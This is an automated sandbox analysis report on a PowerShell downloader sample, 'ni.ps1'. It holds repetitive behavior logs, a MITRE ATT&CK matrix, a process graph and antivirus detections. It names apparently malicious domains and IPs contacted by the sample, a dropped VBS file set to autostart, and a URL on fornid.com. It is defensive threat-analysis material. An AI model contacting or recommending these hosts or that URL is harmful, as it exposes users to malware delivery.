          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information111
          Scripting          		Valid Accounts2
          Command and Scripting Interpreter          		111
          Scripting          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote ServicesData from Local System1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          Registry Run Keys / Startup Folder          		1
          Registry Run Keys / Startup Folder          		21
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          PowerShell          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		11
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Obfuscated Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture14
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568993 Sample: ni.ps1 Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 30 www.fornid.com 2->30 32 fornid.com 2->32 34 5 other IPs or domains 2->34 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 7 other signatures 2->50 9 powershell.exe 16 23 2->9         started        signatures3 process4 dnsIp5 40 fornid.com 93.95.216.175, 443, 49704 SERVERPLAN-ASIT Italy 9->40 42 www.pineappletech.ae 91.193.42.13, 443, 49711 ITFPL Belgium 9->42 28 C:\Users\Public\eji.vbs, ASCII 9->28 dropped 52 Powershell creates an autostart link 9->52 14 wscript.exe 1 9->14         started        17 powershell.exe 23 9->17         started        19 conhost.exe 9->19         started        file6 signatures7 process8 signatures9 54 Suspicious powershell command line found 14->54 56 Wscript starts Powershell (via cmd or directly) 14->56 58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->58 60 Suspicious execution chain found 14->60 21 powershell.exe 36 14->21         started        62 Loading BitLocker PowerShell Module 17->62 process10 dnsIp11 36 erp-royal-crown.info 148.251.114.233, 443, 49733, 49745 HETZNER-ASDE Germany 21->36 38 almrwad.com 184.171.244.231, 443, 49765, 49793 DIMENOCUS United States 21->38 24 conhost.exe 21->24         started        26 cmd.exe 1 21->26         started        process12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          ni.ps129%ReversingLabsScript-PowerShell.Trojan.PShell
          ni.ps1100%AviraTR/PShell.Dldr.VPA

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://www.fornid.com/wh/List%20of%20rzmhquirzmhd%20itzmhms%20and%20szmhrviczmhs.pdf0%Avira URL Cloudsafe
